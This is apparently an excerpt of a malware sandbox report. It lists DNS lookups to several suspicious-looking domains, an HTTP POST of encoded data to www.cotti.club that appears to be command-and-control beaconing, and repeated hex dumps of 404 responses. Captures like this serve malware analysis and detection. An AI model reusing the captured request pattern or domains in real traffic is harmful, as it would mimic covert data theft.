Source: global traffic	DNS traffic detected: DNS query: www.cesach.net
Source: global traffic	DNS traffic detected: DNS query: www.basicreviews.online
Source: global traffic	DNS traffic detected: DNS query: www.sgland06.online
Source: global traffic	DNS traffic detected: DNS query: www.extrime1.shop

Source: unknown

HTTP traffic detected: POST /3ej6/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.5Host: www.cotti.clubCache-Control: max-age=0Content-Type: application/x-www-form-urlencodedContent-Length: 199Connection: closeOrigin: http://www.cotti.clubReferer: http://www.cotti.club/3ej6/User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like GeckoData Raw: 37 38 3d 4c 64 51 48 35 43 50 32 46 6c 65 53 30 51 58 34 77 58 4e 37 55 65 4b 5a 52 4a 6b 49 41 69 56 75 78 71 64 71 6c 66 57 42 76 66 49 78 41 41 39 41 79 70 45 53 4d 68 77 58 72 57 44 36 64 35 6d 67 6f 79 70 4f 62 33 6b 62 47 5a 75 54 55 47 35 4d 4d 37 43 74 42 68 42 47 49 49 2b 6b 68 30 57 4b 2b 62 78 63 41 30 4c 44 72 2f 68 70 43 42 49 59 41 56 41 73 74 41 68 38 47 66 67 4e 63 78 45 56 7a 44 74 64 39 61 45 72 39 39 61 38 31 68 44 53 74 79 74 5a 31 67 38 7a 35 44 55 5a 6e 77 34 41 6f 32 51 76 50 39 72 4c 4a 58 71 6b 32 64 6f 7a 51 4c 67 67 41 57 49 53 36 34 36 73 78 6c 4c 2f 53 77 3d 3d Data Ascii: 78=LdQH5CP2FleS0QX4wXN7UeKZRJkIAiVuxqdqlfWBvfIxAA9AypESMhwXrWD6d5mgoypOb3kbGZuTUG5MM7CtBhBGII+kh0WK+bxcA0LDr/hpCBIYAVAstAh8GfgNcxEVzDtd9aEr99a81hDStytZ1g8z5DUZnw4Ao2QvP9rLJXqk2dozQLggAWIS646sxlL/Sw==

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 31 Oct 2024 00:38:35 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cce1df-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 31 Oct 2024 00:38:37 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cce1df-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 31 Oct 2024 00:38:40 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cce1df-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 31 Oct 2024 00:38:42 GMTContent-Type: text/html; charset=utf-8Content-Length: 2966Connection: closeVary: Accept-EncodingETag: "66cce1df-b96"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 41 72 69 61 6c 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 53 61 6e 73 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 2c 20 22 41 70 70 6c 65 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 53 79 6d 62 6f 6c 22 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 3b 0a 09 09 09 09 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 30 70 78 20 31 70 78 20 31 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 37 35 29 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 7d 0a 0a 09 09 09 68 31 20 7b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 35 65 6d 3b 0a 09 09 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 30 2e 30 32 65 6d 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 33 30 70 78 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 61 6e 69 6d 61 74 65 64 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 31 73 3b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 6f 64 65 3a 20 62 6f 74 68 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 66 61 64 65 49 6e 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 6
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 31 Oct 2024 00:39:15 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FqvMzc9b4Xm8EXRXwIzEUx8qTuQreof9LnpSj757TG6WG80x4Ho%2BYvbZ3OXo6m%2FtEQVc995R9BOgcYzdANGLOEp83aiuuX2fghWWCXrEggENxLM0%2BYkSujP8%2BDxBpKWVkg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8daf9643dcff68f9-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1049&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=704&delivery_rate=0&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 64 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 77 b2 4e d5 03 48 ab 95 a0 49 45 a5 50 22 70 0f 3d 1a bc 95 2b b5 71 b0 5d 42 f9 7a 94 54 48 5c 67 de 8c 66 e8 a6 7a 59 9a 5d 5b c3 93 79 6e a0 dd 3e 36 eb 25 cc 6e 11 d7 b5 59 21 56 a6 ba 3a f3 42 23 d6 9b 19 2b f2 f9 74 64 f2 62 1d 2b ca 87 7c 14 5e e8 05 6c 42 86 55 38 77 8e f0 2a 2a c2 09 a2 f7 e0 2e 63 ae e4 7f 8c 2f 59 51 cf c6 0b 44 f9 3c 4b ca e2 60 fb da c0 60 13 74 21 c3 7e e4 20 74 90 fd 21 41 92 f8 25 b1 20 ec c7 a6 c8 8a ac 73 51 52 e2 87 de 7e 78 81 b7 09 00 9b 61 18 86 42 df 97 f3 52 17 df 97 1f 68 43 cc 70 a7 09 ff 02 8a 70 5a 44 38 3d f9 05 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 04 f8 69 a3 04 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: d6LN0DwNHIEP"p=+q]BzTH\gfzY][yn>6%nY!V:B#+tdb+\|^lBU8w**.c/YQD<K``t!~ t!A% sQR~xaBRhCppZD8=bi0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 31 Oct 2024 00:39:18 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BYjP6e0t%2BMYPZTn0qR%2FdKNOPYh%2FGD%2FxnmuQtwXu1eM3XG18S8P9aDiP7oySl%2F0GnVYlRgn10JoshBpGChVIfvvhW4eAm6boYhHx5rM2PrSTfuIaN%2B4E4r4pWB1oQlQ1%2F6Q%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8daf9653c814e73a-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1145&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=724&delivery_rate=0&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a 64 37 0d 0a 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 77 b2 4e d5 03 48 ab 95 a0 49 45 a5 50 22 70 0f 3d 1a bc 95 2b b5 71 b0 5d 42 f9 7a 94 54 48 5c 67 de 8c 66 e8 a6 7a 59 9a 5d 5b c3 93 79 6e a0 dd 3e 36 eb 25 cc 6e 11 d7 b5 59 21 56 a6 ba 3a f3 42 23 d6 9b 19 2b f2 f9 74 64 f2 62 1d 2b ca 87 7c 14 5e e8 05 6c 42 86 55 38 77 8e f0 2a 2a c2 09 a2 f7 e0 2e 63 ae e4 7f 8c 2f 59 51 cf c6 0b 44 f9 3c 4b ca e2 60 fb da c0 60 13 74 21 c3 7e e4 20 74 90 fd 21 41 92 f8 25 b1 20 ec c7 a6 c8 8a ac 73 51 52 e2 87 de 7e 78 81 b7 09 00 9b 61 18 86 42 df 97 f3 52 17 df 97 1f 68 43 cc 70 a7 09 ff 02 8a 70 5a 44 38 3d f9 05 00 00 ff ff e3 02 00 04 f8 69 a3 04 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: fd7LN0DwNHIEP"p=+q]BzTH\gfzY][yn>6%nY!V:B#+tdb+\|^lBU8w**.c/YQD<K``t!~ t!A% sQR~xaBRhCppZD8=i0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 31 Oct 2024 00:39:20 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CzRp0ITpMiKMmyqvDYE1xNjy3Lah1je4q%2FIS0Upv7LW9qevGZg4yWiG%2FofLNMKnn0SZXK1%2FPhoNLe2rA5qckraWgi%2FGznFJ0LVXn2zWKijQRPFVynSKAqSTox39thQdHPg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8daf9663ad812e72-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2173&sent=3&recv=12&lost=0&retrans=0&sent_bytes=0&recv_bytes=10806&delivery_rate=0&cwnd=217&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 65 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 77 b2 4e d5 03 48 ab 95 a0 49 45 a5 50 22 70 0f 3d 1a bc 95 2b b5 71 b0 5d 42 f9 7a 94 54 48 5c 67 de 8c 66 e8 a6 7a 59 9a 5d 5b c3 93 79 6e a0 dd 3e 36 eb 25 cc 6e 11 d7 b5 59 21 56 a6 ba 3a f3 42 23 d6 9b 19 2b f2 f9 74 64 f2 62 1d 2b ca 87 7c 14 5e e8 05 6c 42 86 55 38 77 8e f0 2a 2a c2 09 a2 f7 e0 2e 63 ae e4 7f 8c 2f 59 51 cf c6 0b 44 f9 3c 4b ca e2 60 fb da c0 60 13 74 21 c3 7e e4 20 74 90 fd 21 41 92 f8 25 b1 20 ec c7 a6 c8 8a ac 73 51 52 e2 87 de 7e 78 81 b7 09 00 9b 61 18 86 42 df 97 f3 52 17 df 97 1f 68 43 cc 70 a7 09 ff 02 8a 70 5a 44 38 3d f9 05 00 00 ff ff e3 02 00 04 f8 69 a3 04 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: e1LN0DwNHIEP"p=+q]BzTH\gfzY][yn>6%nY!V:B#+tdb+\|^lBU8w**.c/YQD<K``t!~ t!A% sQR~xaBRhCppZD8=i0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 31 Oct 2024 00:39:23 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ex3NA40qn75CUdLhGIHIJeT%2Fh5Q3gt3uDkQuj0zOs5DrOvfGrCm4hdvuJ4%2BMltLEVJl2gxny37spWt2QFejTdvRzb6yKU6HazCWEoDjrrf84tlKSZRUKcHOttHICwQPlQg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8daf9673ba1ca916-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1927&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=449&delivery_rate=0&cwnd=139&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 30 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 